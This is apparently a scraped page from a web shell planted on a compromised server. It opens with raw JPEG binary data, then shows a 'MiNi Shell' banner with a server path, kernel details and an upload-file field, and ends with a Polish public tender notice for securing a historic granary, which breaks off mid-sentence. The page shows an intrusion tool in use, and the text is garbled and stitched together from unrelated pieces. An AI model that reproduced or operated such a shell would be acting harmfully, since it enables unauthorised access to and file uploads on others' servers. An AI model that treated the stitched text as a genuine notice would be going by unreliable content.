JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210811/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210811/0014491401-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00144914 z dnia 2021-08-11</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Zabezpieczenia zabytkowego spichlerza w miejscowości Bystrzyca gmina Wólka” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Lubelski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431019508</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Spokojna 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lublin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">20-072</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">81 52 86 600</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">81 52 86 601</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@powiat.lublin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.powiat.lublin.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Zabezpieczenia zabytkowego spichlerza w miejscowości Bystrzyca gmina Wólka” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a7989db9-fa70-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00144914</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003868/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Zabezpieczenie zabytkowego spichlerza w miejscowości Bystrzyca, gmina Wólka” </p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://splublin.bip.lubelskie.pl/index.php?id=604 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://splublin.bip.lubelskie.pl/index.php?id=604 ,<br/>https://miniportal.uzp.gov.pl/,https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://splublin.bip.lubelskie.pl/index.php?id=604 ,<br/>https://miniportal.uzp.gov.pl/,https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Wpostępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami<br/>odbywasię przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl,<br/>ePUAPu,dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej. 8.2<br/>Zamawiającywyznacza następujące osoby do kontaktu z Wykonawcami: Agnieszka Wieleba , tel. 81<br/>52 86 663, Artur Serwicki, tel. 81 52 86 664, email:<br/>przetargi@powiat.lublin..pl8.3Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie<br/>zamówienia publicznego, musiposiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP<br/>ma dostęp do następującychformularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku”<br/>oraz do „Formularza dokomunikacji”.8.4 Wymagania techniczne i organizacyjne wysyłania i odbierania<br/>dokumentówelektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji<br/>przekazywanych przyich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz<br/>Warunkachkorzystania z elektronicznej platformy usług administracji publicznej (ePUAP). Zasady<br/>składania ofertoraz dokumentów składanych wraz z ofertą oraz wymagania techniczne i organizacyjne<br/>ich wysyłaniaopisane zostały w Instrukcji użytkownika. Wykonawca zobowiązany jest zapoznać się z<br/>ww. Instrukcją ipostępować wg zasad w niej wskazanych. Wykonawca ubiegając się o udzielenie<br/>zamówienia wszczególności składając ofertę akceptuje zasady korzystania z systemu miniPortal<br/>wskazane wInstrukcji użytkownika i SWZ. W celu korzystania z systemu miniPortal konieczne jest<br/>dysponowanieprzez użytkownika urządzeniem teleinformatycznym z dostępem do sieci Internet.<br/>Aplikacja działa tylkona platformie Windows i wymaga .NET Framework 4.5. W przypadku korzystania<br/>z urządzeńmobilnych oraz Mac lub Linux, dostęp do wszystkich funkcjonalności systemu miniPortal<br/>może byćograniczony. Specyfikacja połączenia, formatu przesyłanych danych oraz kodowania i<br/>oznaczaniaczasu odbioru danych: specyfikacja połączenia formularze udostępnione są za pomocą<br/>protokołu TLS1.2, format danych oraz kodowanie miniPortal - Formularze dostępne są w formacie<br/>HTML zkodowaniem UTF-8, oznaczenia czasu odbioru danych – miniPortal - wszelkie operacjeopierają się oczas serwera i dane zapisywane są z dokładnością co do setnej części sekundy,<br/>integracja zsystemem ePUAP jest wykonana w wykorzystaniem standardowego mechanizmu ePUAP.<br/>Wprzypadku Wykonawcy wysyłającego wniosek do Zamawiającego, ESP Zamawiającego<br/>automatycznie generuje Rodzaj Urzędowego Poświadczenia Odbioru, czyli Urzędowe Poświadczenie<br/>Przedłożenia(UPP), które jest powiązane z wysyłanym dokumentem. W UPP w sekcji „Dane<br/>poświadczenia” jestzawarta informacja o dacie doręczenia.System dostępny jest za pośrednictwem<br/>następującychprzeglądarek internetowych: Microsoft Internet Explorer od wersji 9.0, Mozilla Firefox od<br/>wersji 15,Google Chrome od wersji 20.8.5 Maksymalny rozmiar plików przesyłanych za<br/>pośrednictwemdedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i<br/>„Formularzado komunikacji” wynosi 150 MB. 8.6 Za datę przekazania oferty, wniosków, zawiadomień,<br/>dokumentówelektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz<br/>innychinformacji przyjmuje się datę ich przekazania na ePUAP.8.7 Zamawiający przekazuje<br/>identyfikatorpostępowania na miniPortalu jako załącznik Nr 9 do SWZ. Dane postępowanie można<br/>wyszukaćrównież na Liście wszystkich postępowań w miniPortalu, klikając wcześniej opcję „Dla<br/>Wykonawców”lub ze strony głównej z zakładki Postępowania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IGM-ZP.272.43 .2021.AW1</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 328014,58 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.1 Przedmiotem zamówienia są roboty budowlane w ramach zadania inwestycyjnego pn.:<br/>„Zabezpieczenia zabytkowego spichlerza w miejscowości Bystrzyca gmina Wólka”.<br/>Zakres robót budowlanych obejmuje m.in.:<br/>- roboty przygotowawcze – karczowanie krzaków, oczyszczenie terenu,<br/>- roboty ziemne,<br/>- zabezpieczenie - podstemplowanie ścian,<br/>- zbrojenie konstrukcji żelbetowych,<br/>- roboty betonowe,<br/>- roboty murowe,<br/>- konstrukcje stalowe,<br/>- obróbki blacharskie – daszki zabezpieczające mur.<br/>4.2 Zamawiający nie dopuszcza składania ofert częściowych.<br/>Zgodnie ze sztuką budowlaną i wiedzą techniczną, technologiczne rozdzielenie przedmiotu<br/>zamówienia wymagałoby poniesienia dodatkowych kosztów m.in.: organizacji robót, organizacji<br/>zaplecza budowy i sprzętu budowlanego, jak również niemożność przekazania placu budowy<br/>kilku wykonawcom jednocześnie (roboty z uwagi na proces technologiczny muszą być<br/>realizowane w tym samym czasie lub następować kolejno po sobie). Podział zamówienia na<br/>części nie byłby właściwy, groziłby nadmiernymi trudnościami technicznymi lub nadmiernymi<br/>kosztami wykonania zamówienia. Potrzeba skoordynowania działań różnych wykonawców<br/>realizujących poszczególne części zamówienia dodatkowo mogłaby poważnie zagrozić<br/>właściwemu i terminowemu wykonaniu zamówienia. Występuje także ryzyko niezakończenia w<br/>tym samym czasie ew. postępowań na wszystkie części zamówienia. Wykonanie zamówienia –<br/>zabezpieczenie zabytkowego spichlerza, polegającej na wykonaniu robót budowlanych tegosamego rodzaju (powiązanych ze sobą tożsamością funkcjonalną, przedmiotową) powodują, że<br/>zgodnie ze sztuką budowlaną, wiedzą techniczną i doświadczeniem Zamawiającego zachodzi<br/>konieczność udzielenia zamówienia w jednym czasie, jednemu wykonawcy.<br/>4.3 Nazwa/y i kod/y Wspólnego Słownika Zamówień: (CPV):<br/>45112210-0 Usuwanie wierzchniej warstwy gleby<br/>45112600-1 Usunięcie drzew i krzewów<br/>45223500-1 Konstrukcje z betonu zbrojonego<br/>45453000-7 Roboty remontowe i renowacyjne<br/>45262520-2 Roboty murowe<br/>45261000-4 Wykonywanie pokryć i konstrukcji dachowych oraz podobne roboty.<br/>4.4 Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku Nr 1 do SWZ. Składają<br/>się na niego następujące dokumenty:<br/>1) dokumentacja projektowa (projekt budowlano-wykonawczy),<br/>2) ogólna specyfikacja techniczna wykonania i odbioru robót budowlanych (OSTWiORB),<br/>3) Przedmiar robót,<br/>Z uwagi na to, że wynagrodzenie Wykonawcy wskazane w ofercie będzie miało charakter<br/>ryczałtowy, Wykonawca przy wycenie oferty powinien opierać się na zakresie wskazanym w<br/>dokumentacji projektowej oraz STWIORB. Przedmiar robót ma charakter pomocniczy.<br/>Wystąpienie w trakcie realizacji umowy robót nieujętych w przedmiarze lub robót w większej<br/>ilości w stosunku do przyjętej w przedmiarze nie będzie uprawniało Wykonawcy do żądania<br/>dodatkowego wynagrodzenia - jeżeli roboty te ujęte były w ww. dokumentach.<br/>4.5 Rozwiązania równoważne.<br/>W każdym przypadku użycia w opisie przedmiotu zamówienia norm, ocen technicznych,<br/>specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1<br/>pkt 2 oraz ust. 3 ustawy Pzp Wykonawca powinien przyjąć, że odniesieniu takiemu towarzyszą<br/>wyrazy „lub równoważne”.<br/>W przypadku użycia w dokumentacji projektowej odniesień do norm, europejskich ocen<br/>technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych<br/>Zamawiający dopuszcza rozwiązania równoważne opisywanym. Wykonawca analizując<br/>dokumentację projektową powinien założyć, że każdemu odniesieniu użytemu w dokumentacji<br/>projektowej towarzyszy wyraz „lub równoważne".<br/>W przypadku, gdy w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru<br/>robót zostały użyte znaki towarowe, oznacza to, że są podane przykładowo i określają jedynie<br/>minimalne oczekiwane parametry jakościowe oraz wymagany standard. Wykonawca może<br/>zastosować materiały lub urządzenia równoważne, lecz o parametrach technicznych i<br/>jakościowych podobnych lub lepszych, których zastosowanie w żaden sposób nie wpłynie<br/>negatywnie na prawidłowe funkcjonowanie rozwiązań przyjętych w dokumentacji projektowej.<br/>Wykonawca, który zastosuje urządzenia lub materiały równoważne będzie obowiązany wykazać<br/>w trakcie realizacji zamówienia, że zastosowane przez niego urządzenia i materiały spełniają<br/>wymagania określone przez Zamawiającego.<br/>Użycie w dokumentacji projektowej etykiety oznacza, że Zamawiający akceptuje wszystkie<br/>etykiety potwierdzające, że dane roboty budowlane, dostawy lub usługi spełniają równoważne<br/>wymagania określonej przez zamawiającego etykiety. W przypadku gdy wykonawca z przyczyn<br/>od niego niezależnych nie może uzyskać określonej przez zamawiającego etykiety lub<br/>równoważnej etykiety, zamawiający, w terminie, przez siebie wyznaczonym akceptuje inne<br/>odpowiednie przedmiotowe środki dowodowe, w szczególności dokumentację techniczną<br/>producenta, o ile dany wykonawca udowodni, że roboty budowlane, dostawy lub usługi, które<br/>mają zostać przez niego wykonane, spełniają wymagania określonej etykiety lub określone<br/>wymagania wskazane przez Zamawiającego.<br/>Użycie w dokumentacji projektowej wymogu posiadania certyfikatu wydanego przez jednostkę<br/>oceniającą zgodność lub sprawozdania z badań przeprowadzonych przez tę jednostkę jako<br/>środka dowodowego potwierdzającego zgodność z wymaganiami lub cechami określonymi w<br/>opisie przedmiotu zamówienia, kryteriach oceny ofert lub warunkach realizacji zamówienia<br/>oznacza, że zamawiający akceptuje również certyfikaty wydane przez inne równoważnejednostki oceniające zgodność. Zamawiający akceptuje także inne odpowiednie środki<br/>dowodowe, w szczególności dokumentację techniczną producenta, w przypadku, gdy dany<br/>Wykonawca nie ma ani dostępu do certyfikatów lub sprawozdań z badań, ani możliwości ich<br/>uzyskania w<br/>odpowiednim terminie, o ile ten brak dostępu nie może być przypisany danemu Wykonawcy,<br/>oraz pod warunkiem, że dany Wykonawca udowodni, że wykonywane przez niego roboty<br/>budowlane, dostawy lub usługi spełniają wymogi lub kryteria określone w opisie przedmiotu<br/>zamówienia, kryteriach oceny ofert lub wymagania związane z realizacją zamówienia.<br/>Jeżeli w opisie przedmiotu zamówienia ujęto zapis wynikający z KNR lub KNNR wskazujący na<br/>konieczność wykorzystywania przy realizacji zamówienia konkretnego sprzętu o konkretnych<br/>parametrach Zamawiający dopuszcza używanie innego sprzętu o ile zapewni to osiągnięcie<br/>zakładanych parametrów projektowych i nie spowoduje ryzyka niezgodności wykonanych prac z<br/>dokumentacją techniczną.<br/>4.6 Gwarancja.<br/>Długość okresu gwarancji jakości na wykonane roboty budowlane wynosi min. 36 miesięcy od<br/>dnia podpisania protokołu odbioru końcowego oraz stanowi kryterium oceny ofert. Zamawiający<br/>określa go na okres w przedziale od 36 miesięcy (termin minimalny) do 60 miesięcy (termin<br/>maksymalny). Wykonawca odpowiada z tytułu rękojmi za wady fizyczne na zasadach<br/>określonych w § 11 Projektu umowy.<br/>4.7 Przedmiotowe środki dowodowe.<br/>Zamawiający nie wymaga od Wykonawcy złożenia wraz z ofertą przedmiotowych środków<br/>dowodowych.<br/>Rozdział 5<br/>TERMIN WYKONANIA ZAMÓWIENIA<br/>5.1. Wykonawca jest zobowiązany wykonać zamówienie w terminie 90 dni od podpisania<br/>umowy.<br/>5.2. Terminy wykonywania poszczególnych robót wskazane będą w harmonogramie rzeczowo –<br/>finansowym, o którym mowa w § 2 ust. 2 Projektu Umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">17.1 Zamawiający dokona oceny ofert, które nie zostały odrzucone, na<br/>podstawie następujących kryteriów oceny ofert:<br/>Lp. Nazwa kryterium Znaczenie kryterium (w %)<br/>1 Cena (C) 60<br/>2 Długość okresu gwarancji jakości na wykonane roboty budowlane (G)<br/>40<br/>Ocena ofert..<br/>Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert,<br/>przyjmując zasadę, że 1% = 1 punkt.<br/>17.2. Punkty za kryterium „Cena” zostaną obliczone według wzoru:<br/>Cn<br/>PC = ------- x 60 pkt ,<br/>Cb<br/>Gdzie: PC - ilość punktów za kryterium cena,Cn - najniższa cena ofertowa spośród ofert nieodrzuconych,<br/>Cb – cena oferty badanej.<br/>W kryterium „Cena”, oferta z najniższą ceną otrzyma 60 punktów a pozostałe oferty po<br/>matematycznym przeliczeniu w odniesieniu do najniższej ceny odpowiednio mniej. Końcowy wynik<br/>powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/>17.3. Kryterium „Długość okresu gwarancji jakości na wykonane roboty budowlane” liczone w okresach<br/>miesięcznych:<br/>W przypadku zaoferowania minimalnej długości okresu gwarancji tj. 36 miesięcy, Wykonawca otrzyma<br/>zero (0) punktów.<br/>W przypadku zaoferowania maksymalnej długości okresu gwarancji tj. 60 miesięcy, Wykonawca<br/>otrzyma czterdzieści (40) punktów.<br/>W przypadku zaoferowania gwarancji pomiędzy 36 a 60 miesięcy Wykonawca otrzyma pkt wg wzoru:<br/>G o<br/>PG = ----------- x 40 pkt<br/>G max.<br/>gdzie: PG - wartość punktowa, którą należy wyznaczyć,<br/>G max. - najdłuższy oferowany okres gwarancji,<br/>Go - okres gwarancji podany w badanej ofercie.<br/>Uwaga:<br/>Zamawiający określa minimalną oraz maksymalną długość okresu gwarancji, w przedziale od 36<br/>miesięcy do 60 miesięcy. W przypadku zaoferowania przez Wykonawcę długości gwarancji krótszego<br/>niż 36 m-cy, Zamawiający ofertę odrzuci. W przypadku, gdy Wykonawca w ogóle nie wskaże w ofercie<br/>oferowanego okresu gwarancji Zamawiający przyjmie, że Wykonawca nie oferuje gwarancji, i ofertę<br/>odrzuci. Wykonawca może zaproponować długość okresu gwarancji dłuższy niż wyznaczony<br/>maksymalny 60 miesięcy, jednak w tym przypadku Zamawiający przyjmie do obliczeń wartość 60 m-cy<br/>- najdłuższy przyjęty w kryterium oceny ofert „Długość okresu gwarancji jakości na wykonane roboty<br/>budowlane”. Wykonawcy oferują długości okresu gwarancji w pełnych miesiącach (w przedziale od 36<br/>do 60 miesięcy).<br/>17.4. Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma największą ilość punktów (PO)<br/>obliczoną na podstawie wzoru:<br/>PO = PC + PG<br/>gdzie:<br/>PO - łączna ilość punktów oferty ocenianej,<br/>PC - liczba punktów uzyskanych w kryterium „Cena”,<br/>PG - liczba punktów uzyskanych w kryterium „Długość okresu gwarancji jakości na wykonane roboty<br/>budowlane”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji jakości na wykonane roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu dotyczące: postępowaniu<br/>6.1.1. zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie określa warunku w ww. zakresie.<br/>6.1.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile<br/>wynika to z odrębnych przepisów;<br/>Zamawiający nie określa warunku w ww. zakresie.<br/>6.1.3. sytuacji ekonomicznej lub finansowej;<br/>Zamawiający nie określa warunku w ww. zakresie<br/>6.1.4 zdolności technicznej lub zawodowej w zakresie:<br/>Opis sposobu dokonywania oceny spełniania tego warunku:<br/>1) Wykonawca winien 